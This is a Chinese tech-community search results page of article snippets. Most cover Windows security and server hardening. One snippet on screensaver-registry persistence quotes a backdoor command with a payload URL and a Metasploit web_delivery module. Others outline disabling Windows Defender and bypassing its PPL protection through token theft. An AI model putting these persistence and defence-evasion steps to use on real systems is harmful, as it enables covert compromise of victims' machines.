首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

windows屏幕保护程序

屏幕保护程序是在用户不活动时间的可配置时间后执行的程序,由文件扩展名为 .scr 的可移植可执行 (PE) 文件组成。...Windows屏幕保护程序应用程序scrnsave.scr位于64位Windows系统中,以及基本Windows安装中包含的屏幕保护程序。...C:\Windows\System32\C:\Windows\sysWOW64\以下屏幕保护程序设置存储在注册表 () 中,可以对其进行操作以实现持久性:HKCU\Control Panel\Desktop...- 在执行屏幕保护程序之前设置用户不活动超时攻击者可以使用屏幕保护程序设置来保持持久性,方法是将屏幕保护程序设置为在用户处于非活动状态的特定时间范围后运行恶意软件。...Add-ScrnSaveBackdoor.ps1Add-ScrnSaveBackdoor -PayloadURL http://192.168.85.161:8080/U4yNTneuse exploit/multi/script/web_deliveryset payload windows

1.8K50
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    自动禁止攻击IP登陆SSH,保护服务器安全

    当你拥有一台服务器并且可以远程ssh登陆后,你会发现有很多恶意扫描工具骚扰你的服务器。最好的方法就是更换SSH登陆的端口号并且定时修改。但是仅仅想禁止某些IP登陆呢?...在服务器上有这么一个文件记录着禁止IP访问的信息,/etc/hosts.deny,如果你不想一个IP通过SSH远程访问你的服务器,可以在这个文件下添加一条信息:sshd:xx.xx.xx.xx:deny...既然手动添加即可生效,那我想通过从sshd的日志里发现恶意访问的IP自动添加到这里该怎么办呢? 前人提供了这么一个脚本可以做这件事。前提:有systemd服务管理。 ssh_deny.sh #!...目前我的服务器已经记录了600多个恶意尝试登陆的IP。

    1.9K20

    永久关闭Windows Defender实时保护

    简介 Windows Defender ,现名 Microsoft Defender,曾用名 Microsoft Anti Spyware ,是一个杀毒程序,可以运行在 Windows XP 和 Windows...Server 2003 操作系统上,并已内置在 Windows Vista , Windows 7 , Windows 8 , Windows 8.1 , Windows 10 和 Windows 11...2020年4月,在 Windows 10 2020年5月更新中(2004),微软更新了 Windows 安全中心应用,将其中的 Windows Defender 更改为 Microsoft Defender...但是通常会被Windows Defender识别为病毒删除。 这都是因为开启了Windows Defender的实时保护功能。记得之前关掉这个实时保护后,就算重启电脑也不会自动开启,现在好像不行了。...win+R后输入gpedit.msc,打开本地组策略编辑器 双击打开关闭实时保护 点击已启用,应用 ,确定

    88820

    绕过ppl保护关闭Windows Defender

    描述 可以关闭Windows Defender服务并通过提升权限删除ppl保护,然后删除Windows Defender中的DLL和其他文件,使Windows Defender服务无法运行,从而导致Windows...攻击步骤 1.将权限升级到trustedinstaller 我们使用受信任的安装程序组令牌自动窃取系统令牌,以提升到受信任的安装程序权限, 在这里,我们使用一个开源工具来利用它: https://github.com...但是这样关闭Windows Defender服务可以手工打开和重启会自动打开,我们想要的是永远关闭Windows Defender服务,在黑客的想法中就是目标无论如何都没有办法再次启动Windows Defender...哈哈哈.... 3.移除 PsProtectSignerAntimalware-Light 保护 关于“保护”的快速背景: 保护进程首先出现在 windows vista 中,作为对关键 windows...用户模式服务的增强,后来在 windows 8.1 中演变为保护进程 (PPL).一般来说可执行文件必须使用特殊证书进行签名,然后才有可能使用保护进程 (PPL)。

    2.5K11

    实战|使用Windows API绕过进程保护

    首发于奇安信攻防社区 文章地址:https://forum.butian.net/share/817 前言 最近在研究某数字杀软的时候看到有个配置选项: img 这个自我保护实际上是加载360SelfProtection.sys...驱动(看这名字应该还有360SelfProtection_win10.sys文件),在0环通过hook等手段保护注册表项,重要进程进程等。...本文就如何实现一个进程保护功能进行探究,驱动就不写了,就写一个用户层的。 实现原理 windows提供了一个可以杀死其他进程的API:TerminateProcess。...#include#include#include"tchar.h"#includeusingnamespace std;BOOL EnbalePrivileges...那么如果要选择性保护进程,又应该怎么做呢。注意TerminateProcess的第一个参数,传入的是一个句柄,这个句柄需要从openprocess的返回值获得,所以我们还需要知道打开进程的句柄。

    2.4K20

    使用DenyHosts保护服务器安全

    在几个月前,笔者介绍了一种保护服务器安全的方法 自动禁止攻击IP登陆SSH,保护服务器安全。这种方法需要自己去动手写相应的脚本,今天要介绍的是开源的脚本实现。...DenyHosts介绍 DenyHosts是一个脚本,旨在由Linux系统管理员运行,以帮助阻止SSH服务器攻击(也称为基于字典的攻击和蛮力攻击)。...如果你曾经看过你的SSH日志(Redhat上的/var/log/ secure,Mandrake上的/var/log/auth.log等等),你可能会惊讶地发现有多少黑客试图访问你的服务器。...自动防止攻击者继续进入你的系统不是更好吗?DenyHosts试图解决以上问题。 以上介绍来自官网。 安装 以下配置项都是基于centos7,读者如果是别的版本,准备工作可能略有不同。...安装EPEL源 有些服务器安装的centos是简版,没有额外的软件包,那么需要先配置EPEL源。

    2K10

    自动配送车行人保护分析

    自动配送车行人保护评测内容的选举 目前自动配送车作为一个新兴的产品门类尚无行人保护法规要求,但自动‍配送车的实际道路测试环境存在大量与行人混行的场景。...因此,美团自动配送车研发部门开展了行人保护分析的先导性研究。...自动配送车行人保护评测内容 自动配送车行人保护设计优化 首先建立包括车辆前端全尺寸细节特征的分析模型,导入材料模型数据,进行部件的装配连接,完成整车力学模型的搭建与调试。...小结 借鉴现有行人保护评测方法针对自动配送车展开了结构优化。优化结果表明,美团自动配送车具有良好的行人保护性能,达到了预期的设计目标。...未来将进一步针对自动配送车的结构特点,研究完善与之适应的行人保护评测办法,进一步提高自动配送车对行人的安全性。 参考来源: 1.

    38820

    自动与时间服务器时间同步,Windows系统时间同步(附时间同步服务器地址)

    而这时在对话框中显示的数字正是自动对时的间隔(以秒为单位),比如默认的604800就是由7(天)×24(时)×60(分)×60(秒)计算来的,看明白了吧,如果您想让XP以多长时间自动对时,只要按这个公式算出具体的秒数...图2 其实,这种情况主要是由于负责对时的服务器流量过大,无法及时响应造成的,而我们也可以让XP与中科院国家授时中心的服务器进行对时,由于是国内的服务器,而且流量相对要少得多,所以对时的成功率还是相当高的...Win98也玩时间同步 大家都知道,在微软的操作系统当中,只有Windows 2000、XP和2003上才集成了时间同步功能,系统会每隔一段周期自动与Internet上的原子钟对时,来保证本机时间的准确...其实,Windows 98系统也能实现类似的时钟同步功能。 图4 1....Windows系统时间同步服务器地址收集 time.nist.gov ntp.fudan.edu.cn [复旦] timekeeper.isi.edu subitaneous.cpsc.ucalgary.ca

    12.2K30

    设置iptables规则来保护CS服务器

    之前在网络上看到大多都使用socat这个工具进行流量转发,但最近和一些师傅交流了解到,有时候使用socat进行转发的时候其稳定性以及速率可能不是那么好,对于流量比较多的情况也许可以使用iptables进行此操作,同时对cs服务器设定一些访问策略...,对真实的cs服务器起到一定保护作用。...网络接口] [-p 协议] [-s 来源ip/网域] [-d 目标ip/网域] –j[ACCEPT|DROP] Iptables设置 首先我需要在跳板机A上使用以下命令将8081端口接收到的流量转发至CS服务器的...8081端口,以及45323端口的访问控制,以及在cs服务器上设置 对整个服务器(全部ip)禁止9100端口 iptables -I INPUT -p tcp --dport 8081 -j DROP...当然这种办法治标不治本,只能对真实的cs服务器起到那么一点保护作用,cs服务器的一些前期隐藏工作和检测规避手段网上有很多,这里就不一一举例了。

    83830

    使用 WPF 开发一个 Windows 屏幕保护程序

    使用 WPF 开发一个 Windows 屏幕保护程序 2018-12-22 02:24 最近有小伙伴问我如何可以让 Windows 静置一段时间不操作之后...我想了想,屏幕保护程序可以做到这一点,而且,屏幕保护程序的开发也是非常简单的。 本文将介绍如何为 Windows 这一悠久的功能进行开发。...实际上屏幕保护程序开始和预览是不同的。预览的时候,只会启动你的程序;而实际开始的时候,Windows 会先为你创建一个白色的背景,覆盖所有的屏幕,然后你的屏幕保护程序窗口显示在那个白色的背景之上。...请预防一些坑 你可能会发现 Windows 自带的屏幕保护程序在 C:\Windows\System32 文件夹中。但!那不是你放屏幕保护程序的地方!...如果把你的屏幕保护程序拷贝到那个 Windows 的受信任目录下,你的程序是无法运行起来的。正确的做法,是右键,使用 “安装” 选项进行安装。

    1.3K20
    领券